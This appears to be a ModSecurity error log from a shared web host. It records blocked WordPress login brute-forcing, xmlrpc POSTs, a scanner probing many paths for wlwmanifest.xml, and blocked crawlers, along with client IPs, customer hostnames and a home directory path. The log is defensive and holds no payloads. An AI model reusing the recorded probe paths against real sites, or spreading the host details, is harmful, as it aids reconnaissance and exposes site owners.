[Tue May 26 18:13:07.241584 2026] [security2:error] [pid 973439:tid 973665] [client 182.63.38.117:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVWgBg9mKRpdEFs3B1wQAAAGA"]
[Tue May 26 18:13:07.548089 2026] [security2:error] [pid 973439:tid 973644] [client 114.119.157.158:24359] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/maps.googleapis.com"] [unique_id "ahWVWwBg9mKRpdEFs3B14gAAAEs"], referer: https://moes-art.com//maps.googleapis.com
[Tue May 26 18:13:08.060249 2026] [security2:error] [pid 973439:tid 973653] [client 82.76.238.33:52450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVXABg9mKRpdEFs3B16QAAAFQ"]
[Tue May 26 18:13:08.062435 2026] [security2:error] [pid 973439:tid 973653] [client 82.76.238.33:52450] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVXABg9mKRpdEFs3B16QAAAFQ"]
[Tue May 26 18:13:08.190878 2026] [security2:error] [pid 973439:tid 973584] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVWwBg9mKRpdEFs3B13gAAAA8"]
[Tue May 26 18:13:08.490482 2026] [security2:error] [pid 973439:tid 973492] [remote 209.38.221.42:59650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.221.38.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWVXABg9mKRpdEFs3B17wAATjQ"]
[Tue May 26 18:13:08.981929 2026] [core:crit] [pid 973439:tid 973570] (13)Permission denied: [client 52.167.144.160:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:13:10.715201 2026] [security2:error] [pid 973439:tid 973679] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVXgBg9mKRpdEFs3B2IAAAAG4"]
[Tue May 26 18:13:12.195468 2026] [security2:error] [pid 973439:tid 973666] [client 31.57.184.20:60370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "senoro.com.mx"] [uri "/wp-login.php"] [unique_id "ahWVYABg9mKRpdEFs3B2TQAAAGE"], referer: https://www.facebook.com/
[Tue May 26 18:13:12.687115 2026] [security2:error] [pid 973439:tid 973629] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVYABg9mKRpdEFs3B2UwAAADw"]
[Tue May 26 18:13:13.816102 2026] [security2:error] [pid 973439:tid 973599] [client 31.57.184.20:60826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "senoro.com.mx"] [uri "/wp-login.php"] [unique_id "ahWVYQBg9mKRpdEFs3B2kQAAAB4"], referer: https://www.google.com/
[Tue May 26 18:13:15.919529 2026] [security2:error] [pid 973439:tid 973630] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVYwBg9mKRpdEFs3B2xAAAAD0"]
[Tue May 26 18:13:16.353377 2026] [security2:error] [pid 973439:tid 973470] [remote 43.239.92.149:47250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.92.239.43.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVZABg9mKRpdEFs3B22AAASB4"]
[Tue May 26 18:13:17.011618 2026] [security2:error] [pid 973439:tid 973463] [remote 43.239.92.149:47250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.92.239.43.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVZQBg9mKRpdEFs3B28gAAIhc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:13:18.977524 2026] [security2:error] [pid 973439:tid 973615] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVZQBg9mKRpdEFs3B3DAAAAC4"]
[Tue May 26 18:13:19.278711 2026] [security2:error] [pid 973439:tid 973639] [client 82.76.238.33:53026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVZwBg9mKRpdEFs3B3LwAAAEY"]
[Tue May 26 18:13:19.278842 2026] [security2:error] [pid 973439:tid 973639] [client 82.76.238.33:53026] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVZwBg9mKRpdEFs3B3LwAAAEY"]
[Tue May 26 18:13:20.382909 2026] [security2:error] [pid 973439:tid 973487] [remote 74.7.241.58:49438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWVaABg9mKRpdEFs3B3UQAAfy8"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/de
[Tue May 26 18:13:20.768799 2026] [security2:error] [pid 973439:tid 973647] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVZwBg9mKRpdEFs3B3SgAAAE4"]
[Tue May 26 18:13:23.874501 2026] [security2:error] [pid 973439:tid 973658] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVawBg9mKRpdEFs3B3lwAAAFk"]
[Tue May 26 18:13:24.277453 2026] [security2:error] [pid 973439:tid 973573] [client 34.57.10.96:55400] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahWVagBg9mKRpdEFs3B3iAAAAAQ"]
[Tue May 26 18:13:24.518149 2026] [security2:error] [pid 973439:tid 973636] [client 34.57.10.96:55400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.10.57.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahWVbABg9mKRpdEFs3B3tgAAAEM"]
[Tue May 26 18:13:24.789166 2026] [security2:error] [pid 973439:tid 973677] [client 34.57.10.96:50754] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWVbABg9mKRpdEFs3B3vQAAAGw"]
[Tue May 26 18:13:25.102486 2026] [security2:error] [pid 973439:tid 973656] [client 34.57.10.96:64728] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWVbQBg9mKRpdEFs3B3ygAAAFc"]
[Tue May 26 18:13:25.375186 2026] [security2:error] [pid 973439:tid 973688] [client 34.57.10.96:58141] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahWVbQBg9mKRpdEFs3B3zgAAAHc"]
[Tue May 26 18:13:25.663104 2026] [security2:error] [pid 973439:tid 973613] [client 34.57.10.96:51317] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWVbQBg9mKRpdEFs3B31gAAACw"]
[Tue May 26 18:13:25.964948 2026] [security2:error] [pid 973439:tid 973647] [client 34.57.10.96:60686] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahWVbQBg9mKRpdEFs3B35QAAAE4"]
[Tue May 26 18:13:26.242211 2026] [security2:error] [pid 973439:tid 973678] [client 34.57.10.96:58824] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWVbgBg9mKRpdEFs3B36QAAAG0"]
[Tue May 26 18:13:26.286890 2026] [security2:error] [pid 973439:tid 973628] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVbQBg9mKRpdEFs3B32wAAADs"]
[Tue May 26 18:13:26.515882 2026] [security2:error] [pid 973439:tid 973640] [client 34.57.10.96:59899] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWVbgBg9mKRpdEFs3B38AAAAEc"]
[Tue May 26 18:13:26.788608 2026] [security2:error] [pid 973439:tid 973597] [client 43.157.158.178:44944] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWVbgBg9mKRpdEFs3B39AAAABw"]
[Tue May 26 18:13:26.839320 2026] [security2:error] [pid 973439:tid 973660] [client 34.57.10.96:54770] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWVbgBg9mKRpdEFs3B3-AAAAFs"]
[Tue May 26 18:13:27.130213 2026] [security2:error] [pid 973439:tid 973612] [client 34.57.10.96:55145] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWVbwBg9mKRpdEFs3B4AgAAACs"]
[Tue May 26 18:13:27.328476 2026] [security2:error] [pid 973439:tid 973489] [remote 209.42.18.223:55476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahWVbwBg9mKRpdEFs3B4AQAABjE"]
[Tue May 26 18:13:29.032788 2026] [security2:error] [pid 973439:tid 973681] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVcABg9mKRpdEFs3B4KQAAAHA"]
[Tue May 26 18:13:30.023802 2026] [security2:error] [pid 973439:tid 973497] [remote 64.22.104.200:50682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 200.104.22.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVcQBg9mKRpdEFs3B4TgAAUjk"]
[Tue May 26 18:13:30.024270 2026] [security2:error] [pid 973439:tid 973662] [client 194.187.176.56:11492] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWVcQBg9mKRpdEFs3B4UgAAAF0"]
[Tue May 26 18:13:30.272371 2026] [security2:error] [pid 973439:tid 973513] [remote 64.22.104.200:50682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 200.104.22.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVcgBg9mKRpdEFs3B4WwAAX0k"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:13:30.416359 2026] [security2:error] [pid 973439:tid 973584] [client 82.76.238.33:53484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVcgBg9mKRpdEFs3B4XAAAAA8"]
[Tue May 26 18:13:30.418715 2026] [security2:error] [pid 973439:tid 973584] [client 82.76.238.33:53484] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVcgBg9mKRpdEFs3B4XAAAAA8"]
[Tue May 26 18:13:30.928955 2026] [security2:error] [pid 973439:tid 973592] [client 194.187.176.180:53214] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWVcgBg9mKRpdEFs3B4ZgAAABc"]
[Tue May 26 18:13:31.650972 2026] [security2:error] [pid 973439:tid 973673] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVcgBg9mKRpdEFs3B4bwAAAGg"]
[Tue May 26 18:13:33.950231 2026] [security2:error] [pid 973439:tid 973579] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWVcwBg9mKRpdEFs3B4gQAAAAo"]
[Tue May 26 18:13:34.191822 2026] [security2:error] [pid 973439:tid 973627] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVdQBg9mKRpdEFs3B4rQAAADo"]
[Tue May 26 18:13:35.387920 2026] [security2:error] [pid 973439:tid 973670] [client 122.183.34.148:31947] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.34.183.122.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "quickdeliveryexp.com"] [uri "/xmlrpc.php"] [unique_id "ahWVdwBg9mKRpdEFs3B4ywAAAGU"]
[Tue May 26 18:13:35.388150 2026] [security2:error] [pid 973439:tid 973670] [client 122.183.34.148:31947] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "quickdeliveryexp.com"] [uri "/xmlrpc.php"] [unique_id "ahWVdwBg9mKRpdEFs3B4ywAAAGU"]
[Tue May 26 18:13:36.025170 2026] [security2:error] [pid 973439:tid 973604] [client 107.173.217.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWVdwBg9mKRpdEFs3B42wAAACM"], referer: https://www.anujtradingco.com/
[Tue May 26 18:13:36.108925 2026] [security2:error] [pid 973439:tid 973667] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWVdwBg9mKRpdEFs3B43gAAAGI"]
[Tue May 26 18:13:37.151882 2026] [security2:error] [pid 973439:tid 973600] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVeABg9mKRpdEFs3B48AAAAB8"]
[Tue May 26 18:13:37.707109 2026] [security2:error] [pid 973439:tid 973574] [client 14.178.23.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVeABg9mKRpdEFs3B4_AAAAAU"]
[Tue May 26 18:13:37.728134 2026] [security2:error] [pid 973439:tid 973640] [client 107.173.217.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWVeQBg9mKRpdEFs3B5CwAAAEc"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1259700&moderation-hash=b82269cbfc117ff10a782a4f8b453b66
[Tue May 26 18:13:39.473535 2026] [security2:error] [pid 973439:tid 973575] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVegBg9mKRpdEFs3B5KgAAAAY"]
[Tue May 26 18:13:41.494084 2026] [security2:error] [pid 973439:tid 973639] [client 82.76.238.33:53925] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVfQBg9mKRpdEFs3B5cAAAAEY"]
[Tue May 26 18:13:41.495975 2026] [security2:error] [pid 973439:tid 973639] [client 82.76.238.33:53925] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVfQBg9mKRpdEFs3B5cAAAAEY"]
[Tue May 26 18:13:41.531166 2026] [security2:error] [pid 973439:tid 973585] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVfABg9mKRpdEFs3B5YwAAABA"]
[Tue May 26 18:13:45.242977 2026] [security2:error] [pid 973439:tid 973641] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVgABg9mKRpdEFs3B5tQAAAEg"]
[Tue May 26 18:13:45.426425 2026] [security2:error] [pid 973439:tid 973572] [client 107.173.217.22:58302] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWVgABg9mKRpdEFs3B5tgAAAAM"], referer: https://anujtradingco.com
[Tue May 26 18:13:46.503958 2026] [security2:error] [pid 973439:tid 973573] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVgQBg9mKRpdEFs3B51wAAAAQ"]
[Tue May 26 18:13:48.472374 2026] [security2:error] [pid 973439:tid 973550] [remote 78.142.18.172:40580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVhABg9mKRpdEFs3B6CgAAVG4"]
[Tue May 26 18:13:48.576285 2026] [security2:error] [pid 973439:tid 973686] [client 117.55.203.182:52341] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.203.55.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWVhABg9mKRpdEFs3B6DQAAAHU"], referer: http://test.anujtradingco.com/wp-admin/
[Tue May 26 18:13:49.856816 2026] [security2:error] [pid 973439:tid 973625] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVhQBg9mKRpdEFs3B6JAAAADg"]
[Tue May 26 18:13:51.624352 2026] [security2:error] [pid 973439:tid 973594] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVhwBg9mKRpdEFs3B6UAAAABk"]
[Tue May 26 18:13:53.669738 2026] [security2:error] [pid 973439:tid 973666] [client 185.191.171.13:55676] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahWViQBg9mKRpdEFs3B6kQAAAGE"]
[Tue May 26 18:13:53.669953 2026] [security2:error] [pid 973439:tid 973666] [client 185.191.171.13:55676] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahWViQBg9mKRpdEFs3B6kQAAAGE"]
